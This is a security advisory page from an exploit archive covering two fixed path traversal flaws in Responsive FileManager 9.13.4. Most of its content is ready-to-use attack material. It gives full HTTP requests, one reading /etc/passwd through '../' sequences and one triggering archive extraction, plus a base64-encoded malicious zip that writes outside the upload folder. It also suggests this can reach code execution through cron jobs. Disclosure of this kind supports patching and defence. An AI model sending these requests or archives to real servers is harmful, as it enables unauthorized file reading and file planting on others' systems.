what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Responsive FileManager 9.13.4 Path Traversal

Responsive FileManager 9.13.4 Path Traversal
Posted Aug 23, 2018
Authored by Simon Uvarov

Responsive FileManager version 9.13.4 suffers from multiple path traversal vulnerabilities.

tags | exploit, vulnerability, file inclusion
advisories | CVE-2018-15535, CVE-2018-15536
SHA-256 | 1c0b5e62101ed7a3b0bbaf833ad6aaf9db23b235f9be4b1afcc438fd06376308

Responsive FileManager 9.13.4 Path Traversal

Change Mirror Download
The following vulnerabilities were fixed in the version 9.13.4.
https://responsivefilemanager.com

#1 Path Traversal Allows to Read Any File

Reserved CVE: CVE-2018-15535
Discovered By: Simon Uvarov
Vendor Status: Fixed

Details:

The following request allows a user to read any file on the system.

GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1
Host: 192.168.5.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.129/filemanager/dialog.php?type=0&popup=1
X-Requested-With: XMLHttpRequest
Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
Connection: close

#2 Path Traversal While Upacking Archives

Reserved CVE: CVE-2018-15536
Discovered By: Simon Uvarov
Vendor Status: Fixed

The following request starts unpacking the exploit.zip archive:

POST /filemanager/ajax_calls.php?action=extract HTTP/1.1
Host: 192.168.5.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.129/filemanager/dialog.php?type=0&lang=en_EN&popup=1&crossdomain=0&relative_url=0&akey=key&fldr=&5b6d9b91535a9&1533909952983
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
Connection: close

path=exploit.zip

Bases64-encoded example of exploit.zip which creates source.txt in /tmp/ directory:

UEsDBBQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdG1w
L3NvdXJjZS50eHR1cGxvYWRzIGZvbGRlclBLAQIUAxQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAA
AAAAAAAAAADtgQAAAAAuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi90bXAvc291cmNlLnR4dFBLBQYA
AAAAAQABAFQAAABSAAAAAAA=

It is possible to create archives containing ../../ as a part of a file path, now it's famous as ZipSlip vulnerability, but it's an old bug.

It is impossible to upload .php files or .htaccess file using this method, but itas possible to create different files with "legal" extensions on a system and it may lead to remote code execution if a server runs with enough privileges, for example, to create cron jobs.


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close